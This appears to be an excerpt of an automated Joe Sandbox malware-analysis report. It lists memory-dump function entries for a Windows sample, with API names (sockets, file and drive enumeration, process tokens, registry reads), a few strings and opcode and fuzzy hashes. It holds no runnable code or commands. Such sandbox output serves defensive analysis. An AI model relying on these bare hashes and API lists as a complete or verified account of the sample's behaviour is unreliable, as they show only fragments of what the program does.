                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$recv$Cleanupclosesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 3402187201-0
                                                                                                                • Opcode ID: 9592191d399957f557f2f11f818494e06d75156a097ad469fff69b209d5fb949
                                                                                                                • Instruction ID: 3f3feedbc4f93bba8a7d5c0c0de0175bdf5045a5daf43a67530335498c4e90de
                                                                                                                • Opcode Fuzzy Hash: 9592191d399957f557f2f11f818494e06d75156a097ad469fff69b209d5fb949
                                                                                                                • Instruction Fuzzy Hash: 51126172A1CAC581EB209B15E4543EA6772EBD97D0F504331EABD86AD9EF7CD580CB00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: c0dcfe63c61778cfeb782a26429f651438a07125ebc27434e957228cb18fa280
                                                                                                                • Instruction ID: 0e96f875ca2ed54cd7cb7721536764af589b91eb4174f0842a87328c077ad1c2
                                                                                                                • Opcode Fuzzy Hash: c0dcfe63c61778cfeb782a26429f651438a07125ebc27434e957228cb18fa280
                                                                                                                • Instruction Fuzzy Hash: C3E1D1A3E18BC145EB109B79C8453FD6722EB997E8F105721EA7D46ADAEF7891C0C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: f3fc50aa6c1617f97820c214b6f357f8593fa625a947542fe4ec2dfdbb2d532b
                                                                                                                • Instruction ID: dbc664b2785a6714434e863566adaf1f1067195c3a165db7ad674f210e708ac2
                                                                                                                • Opcode Fuzzy Hash: f3fc50aa6c1617f97820c214b6f357f8593fa625a947542fe4ec2dfdbb2d532b
                                                                                                                • Instruction Fuzzy Hash: A4C1CF22A0C78781E7608B1594002BEBBB2EF91BD4F554231DA7E877D1EF7EEA458700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2177193445-0
                                                                                                                • Opcode ID: c776229b646a060b2928c0d5c5f80b0a6a94997743fe38de0b506056c7555680
                                                                                                                • Instruction ID: 08fef97ad905a2924b49fa294441a002fd8d970cf6978616d25624acc877893d
                                                                                                                • Opcode Fuzzy Hash: c776229b646a060b2928c0d5c5f80b0a6a94997743fe38de0b506056c7555680
                                                                                                                • Instruction Fuzzy Hash: 8C717C72A08B8685EB108B65E4807AD7771FB857E8F104325EABD52AD9EF7CE081C700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                • String ID:
                                                                                                                • API String ID: 4268643673-0
                                                                                                                • Opcode ID: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
                                                                                                                • Instruction ID: a4119ed655f9d730c57956be0fb11c43f9bf218adf62505ec1f4b33dfb9d059e
                                                                                                                • Opcode Fuzzy Hash: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
                                                                                                                • Instruction Fuzzy Hash: 4A113A32915B9281EB109F25F85006977B4FF48FA4B684735DA6E836E4EF38D897C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: exists
                                                                                                                • API String ID: 3668304517-2996790960
                                                                                                                • Opcode ID: e04a2d50c8f385e6499823a3ebda7b65423cd4e0b226007066fa1e576fa1340b
                                                                                                                • Instruction ID: f36d768c5d7e5e73ed0bc012697920c19f33534da6b83cbdbd0b541a6569e250
                                                                                                                • Opcode Fuzzy Hash: e04a2d50c8f385e6499823a3ebda7b65423cd4e0b226007066fa1e576fa1340b
                                                                                                                • Instruction Fuzzy Hash: 79A19372A18B8695EB14DF28D8402AD6371FB847D8F505736EA6D87AD9EF3CD581C300
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: exists
                                                                                                                • API String ID: 3668304517-2996790960
                                                                                                                • Opcode ID: 1e167dbfa9446cc884f66ef001b47e437e1b8ac97ba8aabf58af8ee335466f06
                                                                                                                • Instruction ID: 92fb97b9117bd39cc3169a610b2c713b3d27a83e0c0e1d8a61098790ac8307d0
                                                                                                                • Opcode Fuzzy Hash: 1e167dbfa9446cc884f66ef001b47e437e1b8ac97ba8aabf58af8ee335466f06
                                                                                                                • Instruction Fuzzy Hash: 24A18472A14B8685EB10DF28D8402AD7371FB847D8F505736EA6D97AE9EF38D581C300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231578192-0
                                                                                                                • Opcode ID: d80f14cf87453080268adb68deae75d6ba4fc3d7dfc0e44dc0fd8621660a0c44
                                                                                                                • Instruction ID: 0cc4186089279fe8c92582e2079c2aed49d955296385637d22c49f3f82093549
                                                                                                                • Opcode Fuzzy Hash: d80f14cf87453080268adb68deae75d6ba4fc3d7dfc0e44dc0fd8621660a0c44
                                                                                                                • Instruction Fuzzy Hash: 2C319132A04B8685E7208F61E850AAE7375FB847DCF600225EEAD57B94EF3CD591C700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: exists$ios_base::badbit set
                                                                                                                • API String ID: 3668304517-2074760687
                                                                                                                • Opcode ID: e619bbfd42c6c03db77ba22fda0677a058d6bbf381ae48a0e42117c7bcf960cf
                                                                                                                • Instruction ID: 3148deac2112601b6a17119a2923bd3bba74f0c2508f778ecf245575ca1bf25a
                                                                                                                • Opcode Fuzzy Hash: e619bbfd42c6c03db77ba22fda0677a058d6bbf381ae48a0e42117c7bcf960cf
                                                                                                                • Instruction Fuzzy Hash: 8CF12F72A1D6C695EB60DB14E4943EAB371FBC5784F805232DAAD82AD9EF3CD505CB00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: exists$ios_base::badbit set
                                                                                                                • API String ID: 0-2074760687
                                                                                                                • Opcode ID: 7b6b1183aa84b4d77525a0bba7c5d13424fb6c8e79121537bf5e2faad3b9cd75
                                                                                                                • Instruction ID: 0565fdb3775d6dfc7640ad1fc770ea2f75897720566ef663fcbe8a002e63c4aa
                                                                                                                • Opcode Fuzzy Hash: 7b6b1183aa84b4d77525a0bba7c5d13424fb6c8e79121537bf5e2faad3b9cd75
                                                                                                                • Instruction Fuzzy Hash: 8FF14E72A19AC691EB20DB14E4943EEB371FBC4784F404232DAAD92AD9EF7CD545CB40
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$DriveFileFindFirstLogicalStrings
                                                                                                                • String ID: content$filename
                                                                                                                • API String ID: 3820383557-474635906
                                                                                                                • Opcode ID: 9fc647629c53a16720b72c556fd9c9da561538ccf96e655352ef13d7647e16b7
                                                                                                                • Instruction ID: 04d089261a253346c42669db2a789e639deb381b4f7c36b98d93295c34e859b3
                                                                                                                • Opcode Fuzzy Hash: 9fc647629c53a16720b72c556fd9c9da561538ccf96e655352ef13d7647e16b7
                                                                                                                • Instruction Fuzzy Hash: A5418562E5C68142EB209B19E04026EA772EFC5BF4F185331EBBD476D9EF7CE5808600
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: 0d176dd797fbc519d31d78ed68bb81ecfa49c2ddc217736fc8585786b44a4904
                                                                                                                • Instruction ID: 0a1335892ba548cb7e5b2e643b417bff17cb73cf5e57a73aa80de51ddb9eb204
                                                                                                                • Opcode Fuzzy Hash: 0d176dd797fbc519d31d78ed68bb81ecfa49c2ddc217736fc8585786b44a4904
                                                                                                                • Instruction Fuzzy Hash: 8451D562B0974685EF249B12A5203BD6261AB44FE4F984731DE7D8B7DAFF3CE1918340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 215268677-0
                                                                                                                • Opcode ID: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
                                                                                                                • Instruction ID: 67c6b76e71cb015b7cc536faaec5e1cf0ed56ca0effae298c1ae0e4c4cd88d7f
                                                                                                                • Opcode Fuzzy Hash: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
                                                                                                                • Instruction Fuzzy Hash: A1110D72A18B8182E7509F11F85076BB3B0FB88B80F545135EAAE87BA8DF3CD405CB40
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-3916222277
                                                                                                                • Opcode ID: 7f2897b162578d5d433b68ac49905666223ccc293319a8928ca3dbb77473c4e8
                                                                                                                • Instruction ID: db10260fd8328224b59185cf3285de7efca8fa90580ac27694c84c3d1bcf4a48
                                                                                                                • Opcode Fuzzy Hash: 7f2897b162578d5d433b68ac49905666223ccc293319a8928ca3dbb77473c4e8
                                                                                                                • Instruction Fuzzy Hash: A1515C32A08B4596EB158F2AD5642687375FB84BD4F944635DB6D837E8EF39E061C300
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                • API String ID: 3702945584-1787575317
                                                                                                                • Opcode ID: ca02e5c3ed8e0fc6be14c1ad152ff79eaac3ff22c286f7938fb5c96ca43ff221
                                                                                                                • Instruction ID: aa678b5fc79f27df4929f8dae014821303bf202e7e448e9ef219843d70fd3513
                                                                                                                • Opcode Fuzzy Hash: ca02e5c3ed8e0fc6be14c1ad152ff79eaac3ff22c286f7938fb5c96ca43ff221
                                                                                                                • Instruction Fuzzy Hash: 9D11303291CB8582D7208F25F4513AAB3A4FB89784F904225EAAD87B99DF7CD155CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Cleanupclosesocketrecv
                                                                                                                • String ID:
                                                                                                                • API String ID: 1729841683-0
                                                                                                                • Opcode ID: f55d7dc3cf14b4febdb0636d9ab5889e94c5031841c0f615dac5b719bd42c758
                                                                                                                • Instruction ID: 2daea23723fa0452cc1145736737b5604fa3ebf576e73754f00208b5bd14acdc
                                                                                                                • Opcode Fuzzy Hash: f55d7dc3cf14b4febdb0636d9ab5889e94c5031841c0f615dac5b719bd42c758
                                                                                                                • Instruction Fuzzy Hash: FD916463E18BC541EB209B24E4543AE6772EBD57E0F504331EABD46AD9EF7DD4808B40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
